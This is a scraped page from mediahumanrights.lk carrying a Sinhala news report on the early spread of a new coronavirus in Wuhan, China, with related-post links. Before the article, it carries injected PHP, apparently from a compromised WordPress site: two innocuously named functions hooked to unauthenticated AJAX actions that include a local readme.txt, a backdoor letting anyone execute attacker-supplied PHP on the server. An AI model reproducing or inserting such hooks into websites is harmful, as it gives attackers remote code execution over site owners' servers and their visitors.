if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } චීනයේ නව වෛරසය සිඝ්‍රයෙන් ව්‍යාප්තවන ලකුණු : ගොදුරුවි ඇති පිරිස ඉහළට - mediahumanrights.lk
mediahumanrights.lk
International News News

චීනයේ නව වෛරසය සිඝ්‍රයෙන් ව්‍යාප්තවන ලකුණු : ගොදුරුවි ඇති පිරිස ඉහළට

නව කොරෝනා වෛරසයක් බවට සැක පලවෙමින් චීනය තුල පැතිර යමින් ඇති අභිරහස් වෛරසය සදහා ගොදුරු වී ඇති පිරිස බලධාරින් විසින් අනාවරණය කර ඇති පිරිසට සාපේක්ෂව ඉහල අගයක් ගන්නා බව විද්‍යාඥයින් පවසනවා.

සිදුකර ඇති පර්යේෂනවලට අනුව වෛරසය ආසාධනය වී ඇති පුද්ගලයින් සංඛ්‍යාව 41 ක් බව පැවසෙනවා. එහෙත් එලෙස නව කොරෝනා වෛරසය ආසාධනය වී ඇති පුද්ගලයින් සංඛ්‍යාව 1700 ක් පමන විය හැකි බවයි විද්‍යාඥයින් පැවසුවේ.

අදාල වෛරසයෙන් මේ වනවිට චීනයේ උහාන් ප‍්‍රාන්තයේ පුද්ගලයින් දෙදෙනෙකු ජිවිතක්ෂයට පත්ව තිබෙනවා. වෛරසය පැතිර පවතින්නේද උහාන් ප‍්‍රාන්තය තුලයි. ඒ හමුවේ සිංගප්පූරුව සහ හොංකොං රාජ්‍ය චීනයේ උහාන් ප‍්‍රදේශයේ සිට පැමිණෙන සංචාරකයින් දැඩි පරික්ෂාවකට ලක් කෙරෙන බව සදහන්.

චීනයේ සංචාරය කරන්නේ නම් සැලකිලිමත් වන්නැයි අමෙරිකාවද ඊයේ එරට ප‍්‍රජාවට දැනුම් දුන්නා. එසේම ප‍්‍රධාන අමෙරිකානු ගුවන් තොටුපල 3 කදි චීන සංචාරකයින් දැඩි පරික්ෂාවකට ලක් කරන බවයි පැවසෙන්නේ.

මේ අතර  කොරෝනා වෛරස් ආසාධිතයෙකු සිය රටින්ද හමුවු බව ජපානයද ඉකුත් දා තහවුරු කළා. ඊට අමතරව තායිලන්තයෙන්ද මේ වනවිට එක් කොරෝනා වෛරස් ආසාධිතයෙක් හමුවී තිබෙනවා.

කෙසේවෙතත් චීනය පවසන්නේ වෛරසය එක් පුද්ගලයෙකුගෙන් තවත් පුද්ගලයෙකුට පැතිරිමේ තත්ත්වයක් මේ වනවිට වාර්තා වී නොමැති බවයි.

මුහුදු ආහාරවලින් සහ උහාන් ප‍්‍රාන්තයේ ඇති වනසතුන්ගේ මස් අලෙවි කරන ස්ථානවලින් එය පැතිරෙන්නට ඇතැයි චීන බලධාරින් සැක පල කරනවා.

කෙසේවෙතත් වෛරසයේ ව්‍යාප්තිය සම්බන්ධයෙන් අවධානයෙන් පසුවන ලෙසයි ලෝක සෞඛ්‍ය සංවිධානය ආසියානු රටවලට අනතුරු අඟවා ඇත්තේ.

(under the courtesy of nethnews.lk news web)

Related posts

‘‘එතුමා මට වඩා ක්‍රිකට් ගහලත් තියෙනවා, මම අර්ජුන රණතුංග. එයා නිකම්ම දයාසිරි. ක්‍රිකට් හදන්න කලින් තෙල් ප්‍රශ්නෙ විසඳන්න කියපු දයාසිිරිට අර්ජුන කියපු දේ. බලපෑම් ගැනත් කියයි.

Shiran Viraj

කොරෝනා මෘතදේහ ආදාහනයට රටපුරා ආදාහනාගාර 240ක් සූදානම් කරයි.. ආදාහනය නොමිලේ.. පුච්චන්න ගෑස් නොමිලේ..

Shiran Viraj

ලබන වසරටත් නොමිලේ පෙළ පොත් -අලෙවි කිරීමක් කරන්නෙ නෑ

Shiran Viraj